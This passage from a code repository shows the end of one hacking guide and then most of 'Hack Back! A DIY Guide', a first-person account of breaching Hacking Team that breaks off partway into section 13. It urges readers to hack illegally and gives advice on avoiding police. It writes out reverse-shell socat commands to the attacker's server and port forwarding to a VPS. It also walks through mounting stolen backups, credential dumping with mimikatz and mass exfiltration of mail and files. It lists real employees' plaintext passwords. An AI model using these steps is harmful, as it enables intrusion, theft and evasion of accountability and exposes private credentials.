2) Taking advantage of the fact that people are nice, trusting, and helpful 95%
|
||||
of the time.
|
||||
The infosec industry invented a term to make this sound like some sort of
|
||||
science: "Social Engineering". This is probably the way to go if you don't know
|
||||
too much about computers, and it really is all it takes to be a successful
|
||||
hacker [0].
|
||||
|
||||
[0] https://www.youtube.com/watch?v=DB6ywr9fngU
|
||||
|
||||
|
||||
--[ 9 ]-- Resources
|
||||
|
||||
Links:
|
||||
|
||||
* https://www.pentesterlab.com/exercises/
|
||||
* http://overthewire.org/wargames/
|
||||
* http://www.hackthissite.org/
|
||||
* http://smashthestack.org/
|
||||
* http://www.win.tue.nl/~aeb/linux/hh/hh.html
|
||||
* http://www.phrack.com/
|
||||
* http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot
|
||||
* http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash
|
||||
* https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/
|
||||
* https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers
|
||||
(all his other blog posts are great too)
|
||||
* https://www.corelan.be/ (start at Exploit writing tutorial part 1)
|
||||
* http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/
|
||||
One trick it leaves out is that on most systems the apache access log is
|
||||
readable only by root, but you can still include from /proc/self/fd/10 or
|
||||
whatever fd apache opened it as. It would also be more useful if it mentioned
|
||||
what versions of php the various tricks were fixed in.
|
||||
* http://www.dest-unreach.org/socat/
|
||||
Get usable reverse shells with a statically linked copy of socat to drop on
|
||||
your target and:
|
||||
target$ socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp-listen:PORTNUM
|
||||
host$ socat file:`tty`,raw,echo=0 tcp-connect:localhost:PORTNUM
|
||||
It's also useful for setting up weird pivots and all kinds of other stuff.
|
||||
|
||||
Books:
|
||||
|
||||
* The Web Application Hacker's Handbook
|
||||
* Hacking: The Art of Exploitation
|
||||
* The Database Hacker's Handbook
|
||||
* The Art of Software Security Assessment
|
||||
* A Bug Hunter's Diary
|
||||
* Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier
|
||||
* TCP/IP Illustrated
|
||||
|
||||
Aside from the hacking specific stuff almost anything useful to a system
|
||||
administrator for setting up and administering networks will also be useful for
|
||||
exploring them. This includes familiarity with the windows command prompt and unix
|
||||
shell, basic scripting skills, knowledge of ldap, kerberos, active directory,
|
||||
networking, etc.
|
||||
|
||||
|
||||
--[ 10 ]-- Outro
|
||||
|
||||
You'll notice some of this sounds exactly like what Gamma is doing. Hacking is a
|
||||
tool. It's not selling hacking tools that makes Gamma evil. It's who their
|
||||
customers are targeting and with what purpose that makes them evil. That's not
|
||||
to say that tools are inherently neutral. Hacking is an offensive tool. In the
|
||||
same way that guerrilla warfare makes it harder to occupy a country, whenever
|
||||
it's cheaper to attack than to defend it's harder to maintain illegitimate
|
||||
authority and inequality. So I wrote this to try to make hacking easier and more
|
||||
accessible. And I wanted to show that the Gamma Group hack really was nothing
|
||||
fancy, just standard sqli, and that you do have the ability to go out and take
|
||||
similar action.
|
||||
|
||||
Solidarity to everyone in Gaza, Israeli conscientious-objectors, Chelsea
|
||||
Manning, Jeremy Hammond, Peter Sunde, anakata, and all other imprisoned
|
||||
hackers, dissidents, and criminals!
|
925
PhineasFisher/2.txt
Executable file
925
PhineasFisher/2.txt
Executable file
|
@ -0,0 +1,925 @@
|
|||
_ _ _ ____ _ _
|
||||
| | | | __ _ ___| | __ | __ ) __ _ ___| | _| |
|
||||
| |_| |/ _` |/ __| |/ / | _ \ / _` |/ __| |/ / |
|
||||
| _ | (_| | (__| < | |_) | (_| | (__| <|_|
|
||||
|_| |_|\__,_|\___|_|\_\ |____/ \__,_|\___|_|\_(_)
|
||||
|
||||
A DIY Guide
|
||||
|
||||
|
||||
|
||||
,-._,-._
|
||||
_,-\ o O_/;
|
||||
/ , ` `|
|
||||
| \-.,___, / `
|
||||
\ `-.__/ / ,.\
|
||||
/ `-.__.-\` ./ \'
|
||||
/ /| ___\ ,/ `\
|
||||
( ( |.-"` '/\ \ `
|
||||
\ \/ ,, | \ _
|
||||
\| o/o / \.
|
||||
\ , / /
|
||||
( __`;-;'__`) \\
|
||||
`//'` `||` `\
|
||||
_// || __ _ _ _____ __
|
||||
.-"-._,(__) .(__).-""-. | | | | |_ _| |
|
||||
/ \ / \ | | |_| | | | |
|
||||
\ / \ / | | _ | | | |
|
||||
`'-------` `--------'` __| |_| |_| |_| |__
|
||||
#antisec
|
||||
|
||||
|
||||
|
||||
--[ 1 - Introduction ]----------------------------------------------------------
|
||||
|
||||
You'll notice the change in language since the last edition [1]. The
|
||||
English-speaking world already has tons of books, talks, guides, and
|
||||
info about hacking. In that world, there's plenty of hackers better than me,
|
||||
but they misuse their talents working for "defense" contractors, for intelligence
|
||||
agencies, to protect banks and corporations, and to defend the status quo.
|
||||
Hacker culture was born in the US as a counterculture, but that origin only
|
||||
remains in its aesthetics - the rest has been assimilated. At least they can
|
||||
wear a t-shirt, dye their hair blue, use their hacker names, and feel like
|
||||
rebels while they work for the Man.
|
||||
|
||||
You used to have to sneak into offices to leak documents [2]. You used to need
|
||||
a gun to rob a bank. Now you can do both from bed with a laptop in hand [3][4].
|
||||
Like the CNT said after the Gamma Group hack: "Let's take a step forward with
|
||||
new forms of struggle" [5]. Hacking is a powerful tool, let's learn and fight!
|
||||
|
||||
[1] http://pastebin.com/raw.php?i=cRYvK4jb
|
||||
[2] https://en.wikipedia.org/wiki/Citizens%27_Commission_to_Investigate_the_FBI
|
||||
[3] http://www.aljazeera.com/news/2015/09/algerian-hacker-hero-hoodlum-150921083914167.html
|
||||
[4] https://securelist.com/files/2015/02/Carbanak_APT_eng.pdf
|
||||
[5] http://madrid.cnt.es/noticia/consideraciones-sobre-el-ataque-informatico-a-gamma-group
|
||||
|
||||
|
||||
--[ 2 - Hacking Team ]----------------------------------------------------------
|
||||
|
||||
Hacking Team was a company that helped governments hack and spy on
|
||||
journalists, activists, political opposition, and other threats to their power
|
||||
[1][2][3][4][5][6][7][8][9][10][11]. And, occasionally, on actual criminals
|
||||
and terrorists [12]. Vincenzetti, the CEO, liked to end his emails with the
|
||||
fascist slogan "boia chi molla". It'd be more correct to say "boia chi vende
|
||||
RCS". They also claimed to have technology to solve the "problem" posed by Tor
|
||||
and the darknet [13]. But seeing as I'm still free, I have my doubts about
|
||||
its effectiveness.
|
||||
|
||||
[1] http://www.animalpolitico.com/2015/07/el-gobierno-de-puebla-uso-el-software-de-hacking-team-para-espionaje-politico/
|
||||
[2] http://www.prensa.com/politica/claves-entender-Hacking-Team-Panama_0_4251324994.html
|
||||
[3] http://www.24-horas.mx/ecuador-espio-con-hacking-team-a-opositor-carlos-figueroa/
|
||||
[4] https://citizenlab.org/2012/10/backdoors-are-forever-hacking-team-and-the-targeting-of-dissent/
|
||||
[5] https://citizenlab.org/2014/02/hacking-team-targeting-ethiopian-journalists/
|
||||
[6] https://citizenlab.org/2015/03/hacking-team-reloaded-us-based-ethiopian-journalists-targeted-spyware/
|
||||
[7] http://focusecuador.net/2015/07/08/hacking-team-rodas-paez-tiban-torres-son-espiados-en-ecuador/
|
||||
[8] http://www.pri.org/stories/2015-07-08/these-ethiopian-journalists-exile-hacking-team-revelations-are-personal
|
||||
[9] https://theintercept.com/2015/07/07/leaked-documents-confirm-hacking-team-sells-spyware-repressive-countries/
|
||||
[10] http://www.wired.com/2013/06/spy-tool-sold-to-governments/
|
||||
[11] http://www.theregister.co.uk/2015/07/13/hacking_team_vietnam_apt/
|
||||
[12] http://www.ilmessaggero.it/primopiano/cronaca/yara_bossetti_hacking_team-1588888.html
|
||||
[13] http://motherboard.vice.com/en_ca/read/hacking-team-founder-hey-fbi-we-can-help-you-crack-the-dark-web
|
||||
|
||||
|
||||
--[ 3 - Stay safe out there ]---------------------------------------------------
|
||||
|
||||
Unfortunately, our world is backwards. You get rich by doing bad things and go
|
||||
to jail for doing good. Fortunately, thanks to the hard work of people like
|
||||
the Tor project [1], you can avoid going to jail by taking a few simple
|
||||
precautions:
|
||||
|
||||
1) Encrypt your hard disk [2]
|
||||
|
||||
I guess when the police arrive to seize your computer, it means you've
|
||||
already made a lot of mistakes, but it's better to be safe.
|
||||
|
||||
2) Use a virtual machine with all traffic routed through Tor
|
||||
|
||||
This accomplishes two things. First, all your traffic is anonymized through
|
||||
Tor. Second, keeping your personal life and your hacking on separate
|
||||
computers helps you not to mix them by accident.
|
||||
|
||||
You can use projects like Whonix [3], Tails [4], Qubes TorVM [5], or
|
||||
something custom [6]. Here's [7] a detailed comparison.
|
||||
|
||||
3) (Optional) Don't connect directly to Tor
|
||||
|
||||
Tor isn't a panacea. They can correlate the times you're connected to Tor
|
||||
with the times your hacker handle is active. Also, there have been
|
||||
successful attacks against Tor [8]. You can connect to Tor using other
|
||||
peoples' wifi. Wifislax [9] is a linux distro with a lot of tools for
|
||||
cracking wifi. Another option is to connect to a VPN or a bridge node [10]
|
||||
before Tor, but that's less secure because they can still correlate the
|
||||
hacker's activity with your house's internet activity (this was used as
|
||||
evidence against Jeremy Hammond [11]).
|
||||
|
||||
The reality is that while Tor isn't perfect, it works quite well. When I
|
||||
was young and reckless, I did plenty of stuff without any protection (I'm
|
||||
referring to hacking) apart from Tor, that the police tried their hardest
|
||||
to investigate, and I've never had any problems.
|
||||
|
||||
[1] https://www.torproject.org/
|
||||
[2] https://info.securityinabox.org/es/chapter-4
|
||||
[3] https://www.whonix.org/
|
||||
[4] https://tails.boum.org/
|
||||
[5] https://www.qubes-os.org/doc/privacy/torvm/
|
||||
[6] https://trac.torproject.org/projects/tor/wiki/doc/TransparentProxy
|
||||
[7] https://www.whonix.org/wiki/Comparison_with_Others
|
||||
[8] https://blog.torproject.org/blog/tor-security-advisory-relay-early-traffic-confirmation-attack/
|
||||
[9] http://www.wifislax.com/
|
||||
[10] https://www.torproject.org/docs/bridges.html.en
|
||||
[11] http://www.documentcloud.org/documents/1342115-timeline-correlation-jeremy-hammond-and-anarchaos.html
|
||||
|
||||
|
||||
----[ 3.1 - Infrastructure ]----------------------------------------------------
|
||||
|
||||
I don't hack directly from Tor exit nodes. They're on blacklists, they're
|
||||
slow, and they can't receive connect-backs. Tor protects my anonymity while I
|
||||
connect to the infrastructure I use to hack, which consists of:
|
||||
|
||||
1) Domain Names
|
||||
|
||||
For C&C addresses, and for DNS tunnels for guaranteed egress.
|
||||
|
||||
2) Stable Servers
|
||||
|
||||
For use as C&C servers, to receive connect-back shells, to launch attacks,
|
||||
and to store the loot.
|
||||
|
||||
3) Hacked Servers
|
||||
|
||||
For use as pivots to hide the IP addresses of the stable servers. And for
|
||||
when I want a fast connection without pivoting, for example to scan ports,
|
||||
scan the whole internet, download a database with sqli, etc.
|
||||
|
||||
Obviously, you have to use an anonymous payment method, like bitcoin (if it's
|
||||
used carefully).
|
||||
|
||||
|
||||
----[ 3.2 - Attribution ]-------------------------------------------------------
|
||||
|
||||
In the news we often see attacks traced back to government-backed hacking
|
||||
groups ("APTs"), because they repeatedly use the same tools, leave the same
|
||||
footprints, and even use the same infrastructure (domains, emails, etc).
|
||||
They're negligent because they can hack without legal consequences.
|
||||
|
||||
I didn't want to make the police's work any easier by relating my hack of
|
||||
Hacking Team with other hacks I've done or with names I use in my day-to-day
|
||||
work as a blackhat hacker. So, I used new servers and domain names, registered
|
||||
with new emails, and payed for with new bitcoin addresses. Also, I only used
|
||||
tools that are publicly available, or things that I wrote specifically for
|
||||
this attack, and I changed my way of doing some things to not leave my usual
|
||||
forensic footprint.
|
||||
|
||||
|
||||
--[ 4 - Information Gathering ]-------------------------------------------------
|
||||
|
||||
Although it can be tedious, this stage is very important, since the larger the
|
||||
attack surface, the easier it is to find a hole somewhere in it.
|
||||
|
||||
|
||||
----[ 4.1 - Technical Information ]---------------------------------------------
|
||||
|
||||
Some tools and techniques are:
|
||||
|
||||
1) Google
|
||||
|
||||
A lot of interesting things can be found with a few well-chosen search
|
||||
queries. For example, the identity of DPR [1]. The bible of Google hacking
|
||||
is the book "Google Hacking for Penetration Testers". You can find a short
|
||||
summary in Spanish at [2].
|
||||
|
||||
2) Subdomain Enumeration
|
||||
|
||||
Often, a company's main website is hosted by a third party, and you'll find
|
||||
the company's actual IP range thanks to subdomains like mx.company.com or
|
||||
ns1.company.com. Also, sometimes there are things that shouldn't be exposed
|
||||
in "hidden" subdomains. Useful tools for discovering domains and subdomains
|
||||
are fierce [3], theHarvester [4], and recon-ng [5].
|
||||
|
||||
3) Whois lookups and reverse lookups
|
||||
|
||||
With a reverse lookup using the whois information from a domain or IP range
|
||||
of a company, you can find other domains and IP ranges. As far as I know,
|
||||
there's no free way to do reverse lookups aside from a google "hack":
|
||||
|
||||
"via della moscova 13" site:www.findip-address.com
|
||||
"via della moscova 13" site:domaintools.com
|
||||
|
||||
4) Port scanning and fingerprinting
|
||||
|
||||
Unlike the other techniques, this talks to the company's servers. I
|
||||
include it in this section because it's not an attack, it's just
|
||||
information gathering. The company's IDS might generate an alert, but you
|
||||
don't have to worry since the whole internet is being scanned constantly.
|
||||
|
||||
For scanning, nmap [6] is precise, and can fingerprint the majority of
|
||||
services discovered. For companies with very large IP ranges, zmap [7] or
|
||||
masscan [8] are fast. WhatWeb [9] or BlindElephant [10] can fingerprint web
|
||||
sites.
|
||||
|
||||
[1] http://www.nytimes.com/2015/12/27/business/dealbook/the-unsung-tax-agent-who-put-a-face-on-the-silk-road.html
|
||||
[2] http://web.archive.org/web/20140610083726/http://www.soulblack.com.ar/repo/papers/hackeando_con_google.pdf
|
||||
[3] http://ha.ckers.org/fierce/
|
||||
[4] https://github.com/laramies/theHarvester
|
||||
[5] https://bitbucket.org/LaNMaSteR53/recon-ng
|
||||
[6] https://nmap.org/
|
||||
[7] https://zmap.io/
|
||||
[8] https://github.com/robertdavidgraham/masscan
|
||||
[9] http://www.morningstarsecurity.com/research/whatweb
|
||||
[10] http://blindelephant.sourceforge.net/
|
||||
|
||||
|
||||
----[ 4.2 - Social Information ]------------------------------------------------
|
||||
|
||||
For social engineering, it's useful to have information about the employees,
|
||||
their roles, contact information, operating system, browser, plugins,
|
||||
software, etc. Some resources are:
|
||||
|
||||
1) Google
|
||||
|
||||
Here as well, it's the most useful tool.
|
||||
|
||||
2) theHarvester and recon-ng
|
||||
|
||||
I already mentioned them in the previous section, but they have a lot more
|
||||
functionality. They can find a lot of information quickly and
|
||||
automatically. It's worth reading all their documentation.
|
||||
|
||||
3) LinkedIn
|
||||
|
||||
A lot of information about the employees can be found here. The company's
|
||||
recruiters are the most likely to accept your connection requests.
|
||||
|
||||
4) Data.com
|
||||
|
||||
Previously known as jigsaw. They have contact information for many
|
||||
employees.
|
||||
|
||||
5) File Metadata
|
||||
|
||||
A lot of information about employees and their systems can be found in
|
||||
metadata of files the company has published. Useful tools for finding
|
||||
files on the company's website and extracting the metadata are metagoofil
|
||||
[1] and FOCA [2].
|
||||
|
||||
[1] https://github.com/laramies/metagoofil
|
||||
[2] https://www.elevenpaths.com/es/labstools/foca-2/index.html
|
||||
|
||||
|
||||
--[ 5 - Entering the network ]--------------------------------------------------
|
||||
|
||||
There are various ways to get a foothold. Since the method I used against
|
||||
Hacking Team is uncommon and a lot more work than is usually necessary, I'll
|
||||
talk a little about the two most common ways, which I recommend trying first.
|
||||
|
||||
|
||||
----[ 5.1 - Social Engineering ]------------------------------------------------
|
||||
|
||||
Social engineering, specifically spear phishing, is responsible for the
|
||||
majority of hacks these days. For an introduction in Spanish, see [1]. For
|
||||
more information in English, see [2] (the third part, "Targeted Attacks"). For
|
||||
fun stories about the social engineering exploits of past generations, see
|
||||
[3]. I didn't want to try to spear phish Hacking Team, as their whole business
|
||||
is helping governments spear phish their opponents, so they'd be much more
|
||||
likely to recognize and investigate a spear phishing attempt.
|
||||
|
||||
[1] http://www.hacknbytes.com/2016/01/apt-pentest-con-empire.html
|
||||
[2] http://blog.cobaltstrike.com/2015/09/30/advanced-threat-tactics-course-and-notes/
|
||||
[3] http://www.netcomunity.com/lestertheteacher/doc/ingsocial1.pdf
|
||||
|
||||
|
||||
----[ 5.2 - Buying Access ]-----------------------------------------------------
|
||||
|
||||
Thanks to hardworking Russians and their exploit kits, traffic sellers, and
|
||||
bot herders, many companies already have compromised computers in their
|
||||
networks. Almost all of the Fortune 500, with their huge networks, have some
|
||||
bots already inside. However, Hacking Team is a very small company, and most
|
||||
of it's employees are infosec experts, so there was a low chance that they'd
|
||||
already been compromised.
|
||||
|
||||
|
||||
----[ 5.3 - Technical Exploitation ]--------------------------------------------
|
||||
|
||||
After the Gamma Group hack, I described a process for searching for
|
||||
vulnerabilities [1]. Hacking Team had one public IP range:
|
||||
inetnum: 93.62.139.32 - 93.62.139.47
|
||||
descr: HT public subnet
|
||||
|
||||
Hacking Team had very little exposed to the internet. For example, unlike
|
||||
Gamma Group, their customer support site needed a client certificate to
|
||||
connect. What they had was their main website (a Joomla blog in which Joomscan
|
||||
[2] didn't find anything serious), a mail server, a couple routers, two VPN
|
||||
appliances, and a spam filtering appliance. So, I had three options: look for
|
||||
a 0day in Joomla, look for a 0day in postfix, or look for a 0day in one of the
|
||||
embedded devices. A 0day in an embedded device seemed like the easiest option,
|
||||
and after two weeks of work reverse engineering, I got a remote root exploit.
|
||||
Since the vulnerabilities still haven't been patched, I won't give more
|
||||
details, but for more information on finding these kinds of vulnerabilities,
|
||||
see [3] and [4].
|
||||
|
||||
[1] http://pastebin.com/raw.php?i=cRYvK4jb
|
||||
[2] http://sourceforge.net/projects/joomscan/
|
||||
[3] http://www.devttys0.com/
|
||||
[4] https://docs.google.com/presentation/d/1-mtBSka1ktdh8RHxo2Ft0oNNlIp7WmDA2z9zzHpon8A
|
||||
|
||||
|
||||
--[ 6 - Be Prepared ]-----------------------------------------------------------
|
||||
|
||||
I did a lot of work and testing before using the exploit against Hacking Team.
|
||||
I wrote a backdoored firmware, and compiled various post-exploitation tools
|
||||
for the embedded device. The backdoor serves to protect the exploit. Using the
|
||||
exploit just once and then returning through the backdoor makes it harder to
|
||||
identify and patch the vulnerabilities.
|
||||
|
||||
The post-exploitation tools that I'd prepared were:
|
||||
|
||||
1) busybox
|
||||
|
||||
For all the standard Unix utilities that the system didn't have.
|
||||
|
||||
2) nmap
|
||||
|
||||
To scan and fingerprint Hacking Team's internal network.
|
||||
|
||||
3) Responder.py
|
||||
|
||||
The most useful tool for attacking windows networks when you have access to
|
||||
the internal network, but no domain user.
|
||||
|
||||
4) Python
|
||||
|
||||
To execute Responder.py
|
||||
|
||||
5) tcpdump
|
||||
|
||||
For sniffing traffic.
|
||||
|
||||
6) dsniff
|
||||
|
||||
For sniffing passwords from plaintext protocols like ftp, and for
|
||||
arpspoofing. I wanted to use ettercap, written by Hacking Team's own ALoR
|
||||
and NaGA, but it was hard to compile it for the system.
|
||||
|
||||
7) socat
|
||||
|
||||
For a comfortable shell with a pty:
|
||||
my_server: socat file:`tty`,raw,echo=0 tcp-listen:my_port
|
||||
hacked box: socat exec:'bash -li',pty,stderr,setsid,sigint,sane \
|
||||
tcp:my_server:my_port
|
||||
|
||||
And useful for a lot more, it's a networking swiss army knife. See the
|
||||
examples section of its documentation.
|
||||
|
||||
8) screen
|
||||
|
||||
Like the shell with pty, it wasn't really necessary, but I wanted to feel
|
||||
at home in Hacking Team's network.
|
||||
|
||||
9) a SOCKS proxy server
|
||||
|
||||
To use with proxychains to be able to access their local network from any
|
||||
program.
|
||||
|
||||
10) tgcd
|
||||
|
||||
For forwarding ports, like for the SOCKS server, through the firewall.
|
||||
|
||||
[1] https://www.busybox.net/
|
||||
[2] https://nmap.org/
|
||||
[3] https://github.com/SpiderLabs/Responder
|
||||
[4] https://github.com/bendmorris/static-python
|
||||
[5] http://www.tcpdump.org/
|
||||
[6] http://www.monkey.org/~dugsong/dsniff/
|
||||
[7] http://www.dest-unreach.org/socat/
|
||||
[8] https://www.gnu.org/software/screen/
|
||||
[9] http://average-coder.blogspot.com/2011/09/simple-socks5-server-in-c.html
|
||||
[10] http://tgcd.sourceforge.net/
|
||||
|
||||
|
||||
The worst thing that could happen would be for my backdoor or post-exploitation
|
||||
tools to make the system unstable and cause an employee to investigate. So I
|
||||
spent a week testing my exploit, backdoor, and post-exploitation tools in the
|
||||
networks of other vulnerable companies before entering Hacking Team's network.
|
||||
|
||||
|
||||
--[ 7 - Watch and Listen ]------------------------------------------------------
|
||||
|
||||
Now inside their internal network, I wanted to take a look around and think
|
||||
about my next step. I started Responder.py in analysis mode (-A to listen
|
||||
without sending poisoned responses), and did a slow scan with nmap.
|
||||
|
||||
|
||||
--[ 8 - NoSQL Databases ]-------------------------------------------------------
|
||||
|
||||
NoSQL, or rather NoAuthentication, has been a huge gift to the hacker
|
||||
community [1]. Just when I was worried that they'd finally patched all of the
|
||||
authentication bypass bugs in MySQL [2][3][4][5], new databases came into
|
||||
style that lack authentication by design. Nmap found a few in Hacking Team's
|
||||
internal network:
|
||||
|
||||
27017/tcp open mongodb MongoDB 2.6.5
|
||||
| mongodb-databases:
|
||||
| ok = 1
|
||||
| totalSizeMb = 47547
|
||||
| totalSize = 49856643072
|
||||
...
|
||||
|_ version = 2.6.5
|
||||
|
||||
27017/tcp open mongodb MongoDB 2.6.5
|
||||
| mongodb-databases:
|
||||
| ok = 1
|
||||
| totalSizeMb = 31987
|
||||
| totalSize = 33540800512
|
||||
| databases
|
||||
...
|
||||
|_ version = 2.6.5
|
||||
|
||||
They were the databases for test instances of RCS. The audio that RCS records
|
||||
is stored in MongoDB with GridFS. The audio folder in the torrent [6] came
|
||||
from this. They were spying on themselves without meaning to.
|
||||
|
||||
[1] https://www.shodan.io/search?query=product%3Amongodb
|
||||
[2] https://community.rapid7.com/community/metasploit/blog/2012/06/11/cve-2012-2122-a-tragically-comedic-security-flaw-in-mysql
|
||||
[3] http://archives.neohapsis.com/archives/vulnwatch/2004-q3/0001.html
|
||||
[4] http://downloads.securityfocus.com/vulnerabilities/exploits/hoagie_mysql.c
|
||||
[5] http://archives.neohapsis.com/archives/bugtraq/2000-02/0053.html
|
||||
[6] https://ht.transparencytoolkit.org/audio/
|
||||
|
||||
|
||||
--[ 9 - Crossed Cables ]--------------------------------------------------------
|
||||
|
||||
Although it was fun to listen to recordings and see webcam images of Hacking
|
||||
Team developing their malware, it wasn't very useful. Their insecure backups
|
||||
were the vulnerability that opened their doors. According to their
|
||||
documentation [1], their iSCSI devices were supposed to be on a separate
|
||||
network, but nmap found a few in their subnetwork 192.168.1.200/24:
|
||||
|
||||
Nmap scan report for ht-synology.hackingteam.local (192.168.200.66)
|
||||
...
|
||||
3260/tcp open iscsi?
|
||||
| iscsi-info:
|
||||
| Target: iqn.2000-01.com.synology:ht-synology.name
|
||||
| Address: 192.168.200.66:3260,0
|
||||
|_ Authentication: No authentication required
|
||||
|
||||
Nmap scan report for synology-backup.hackingteam.local (192.168.200.72)
|
||||
...
|
||||
3260/tcp open iscsi?
|
||||
| iscsi-info:
|
||||
| Target: iqn.2000-01.com.synology:synology-backup.name
|
||||
| Address: 10.0.1.72:3260,0
|
||||
| Address: 192.168.200.72:3260,0
|
||||
|_ Authentication: No authentication required
|
||||
|
||||
iSCSI needs a kernel module, and it would've been difficult to compile it for
|
||||
the embedded system. I forwarded the port so that I could mount it from a VPS:
|
||||
|
||||
VPS: tgcd -L -p 3260 -q 42838
|
||||
Embedded system: tgcd -C -s 192.168.200.72:3260 -c VPS_IP:42838
|
||||
|
||||
VPS: iscsiadm -m discovery -t sendtargets -p 127.0.0.1
|
||||
|
||||
Now iSCSI finds the name iqn.2000-01.com.synology but has problems mounting it
|
||||
because it thinks its IP is 192.168.200.72 instead of 127.0.0.1
|
||||
|
||||
The way I solved it was:
|
||||
iptables -t nat -A OUTPUT -d 192.168.200.72 -j DNAT --to-destination 127.0.0.1
|
||||
|
||||
And now, after:
|
||||
iscsiadm -m node --targetname=iqn.2000-01.com.synology:synology-backup.name -p 192.168.200.72 --login
|
||||
|
||||
...the device file appears! We mount it:
|
||||
vmfs-fuse -o ro /dev/sdb1 /mnt/tmp
|
||||
|
||||
and find backups of various virtual machines. The Exchange server seemed like
|
||||
the most interesting. It was too big too download, but it was possible to
|
||||
mount it remotely to look for interesting files:
|
||||
$ losetup /dev/loop0 Exchange.hackingteam.com-flat.vmdk
|
||||
$ fdisk -l /dev/loop0
|
||||
/dev/loop0p1 2048 1258287103 629142528 7 HPFS/NTFS/exFAT
|
||||
|
||||
so the offset is 2048 * 512 = 1048576
|
||||
$ losetup -o 1048576 /dev/loop1 /dev/loop0
|
||||
$ mount -o ro /dev/loop1 /mnt/exchange/
|
||||
|
||||
now in /mnt/exchange/WindowsImageBackup/EXCHANGE/Backup 2014-10-14 172311
|
||||
we find the hard disk of the VM, and mount it:
|
||||
vdfuse -r -t VHD -f f0f78089-d28a-11e2-a92c-005056996a44.vhd /mnt/vhd-disk/
|
||||
mount -o loop /mnt/vhd-disk/Partition1 /mnt/part1
|
||||
|
||||
...and finally we've unpacked the Russian doll and can see all the files from
|
||||
the old Exchange server in /mnt/part1
|
||||
|
||||
[1] https://ht.transparencytoolkit.org/FileServer/FileServer/Hackingteam/InfrastrutturaIT/Rete/infrastruttura%20ht.pdf
|
||||
|
||||
|
||||
--[ 10 - From backups to domain admin ]-----------------------------------------
|
||||
|
||||
What interested me most in the backup was seeing if it had a password or hash
|
||||
that could be used to access the live server. I used pwdump, cachedump, and
|
||||
lsadump [1] on the registry hives. lsadump found the password to the besadmin
|
||||
service account:
|
||||
|
||||
_SC_BlackBerry MDS Connection Service
|
||||
0000 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
|
||||
0010 62 00 65 00 73 00 33 00 32 00 36 00 37 00 38 00 b.e.s.3.2.6.7.8.
|
||||
0020 21 00 21 00 21 00 00 00 00 00 00 00 00 00 00 00 !.!.!...........
|
||||
|
||||
I used proxychains [2] with the socks server on the embedded device and
|
||||
smbclient [3] to check the password:
|
||||
proxychains smbclient '//192.168.100.51/c$' -U 'hackingteam.local/besadmin%bes32678!!!'
|
||||
|
||||
It worked! The password for besadmin was still valid, and a local admin. I
|
||||
used my proxy and metasploit's psexec_psh [4] to get a meterpreter session.
|
||||
Then I migrated to a 64 bit process, ran "load kiwi" [5], "creds_wdigest", and
|
||||
got a bunch of passwords, including the Domain Admin:
|
||||
|
||||
HACKINGTEAM BESAdmin bes32678!!!
|
||||
HACKINGTEAM Administrator uu8dd8ndd12!
|
||||
HACKINGTEAM c.pozzi P4ssword <---- lol great sysadmin
|
||||
HACKINGTEAM m.romeo ioLK/(90
|
||||
HACKINGTEAM l.guerra 4luc@=.=
|
||||
HACKINGTEAM d.martinez W4tudul3sp
|
||||
HACKINGTEAM g.russo GCBr0s0705!
|
||||
HACKINGTEAM a.scarafile Cd4432996111
|
||||
HACKINGTEAM r.viscardi Ht2015!
|
||||
HACKINGTEAM a.mino A!e$$andra
|
||||
HACKINGTEAM m.bettini Ettore&Bella0314
|
||||
HACKINGTEAM m.luppi Blackou7
|
||||
HACKINGTEAM s.gallucci 1S9i8m4o!
|
||||
HACKINGTEAM d.milan set!dob66
|
||||
HACKINGTEAM w.furlan Blu3.B3rry!
|
||||
HACKINGTEAM d.romualdi Rd13136f@#
|
||||
HACKINGTEAM l.invernizzi L0r3nz0123!
|
||||
HACKINGTEAM e.ciceri 2O2571&2E
|
||||
HACKINGTEAM e.rabe erab@4HT!
|
||||
|
||||
[1] https://github.com/Neohapsis/creddump7
|
||||
[2] http://proxychains.sourceforge.net/
|
||||
[3] https://www.samba.org/
|
||||
[4] http://ns2.elhacker.net/timofonica/manuales/Manual_de_Metasploit_Unleashed.pdf
|
||||
[5] https://github.com/gentilkiwi/mimikatz
|
||||
|
||||
|
||||
--[ 11 - Downloading the mail ]-------------------------------------------------
|
||||
|
||||
With the Domain Admin password, I have access to the email, the heart of the
|
||||
company. Since with each step I take there's a chance of being detected, I
|
||||
start downloading their email before continuing to explore. Powershell makes
|
||||
it easy [1]. Curiously, I found a bug with Powershell's date handling. After
|
||||
downloading the emails, it took me another couple weeks to get access to the
|
||||
source code and everything else, so I returned every now and then to download
|
||||
the new emails. The server was Italian, with dates in the format
|
||||
day/month/year. I used:
|
||||
-ContentFilter {(Received -ge '05/06/2015') -or (Sent -ge '05/06/2015')}
|
||||
|
||||
with New-MailboxExportRequest to download the new emails (in this case all
|
||||
mail since June 5). The problem is it says the date is invalid if you
|
||||
try a day larger than 12 (I imagine because in the US the month comes first
|
||||
and you can't have a month above 12). It seems like Microsoft's engineers only
|
||||
test their software with their own locale.
|
||||
|
||||
[1] http://www.stevieg.org/2010/07/using-the-exchange-2010-sp1-mailbox-export-features-for-mass-exports-to-pst/
|
||||
|
||||
|
||||
--[ 12 - Downloading Files ]----------------------------------------------------
|
||||
|
||||
Now that I'd gotten Domain Admin, I started to download file shares using my
|
||||
proxy and the -Tc option of smbclient, for example:
|
||||
|
||||
proxychains smbclient '//192.168.1.230/FAE DiskStation' \
|
||||
-U 'HACKINGTEAM/Administrator%uu8dd8ndd12!' -Tc FAE_DiskStation.tar '*'
|
||||
|
||||
I downloaded the Amministrazione, FAE DiskStation, and FileServer folders in
|
||||
the torrent like that.
|
||||
|
||||
|
||||
--[ 13 - Introduction to hacking windows domains ]------------------------------
|
||||
|
||||
Before continuing with the story of the "weones culiaos" (Hacking Team), I
|
||||
should give some general knowledge for hacking windows networks.
|
||||
|
||||
|
||||
----[ 13.1 - Lateral Movement ]-------------------------------------------------
|
||||
|
||||
I'll give a brief review of the different techniques for spreading withing a
|
||||
windows network. The techniques for remote execution require the password or
|
||||
hash of a local admin on the target. By far, the most common way of obtaining
|
||||
those credentials is using mimikatz [1], especially sekurlsa::logonpasswords
|
||||
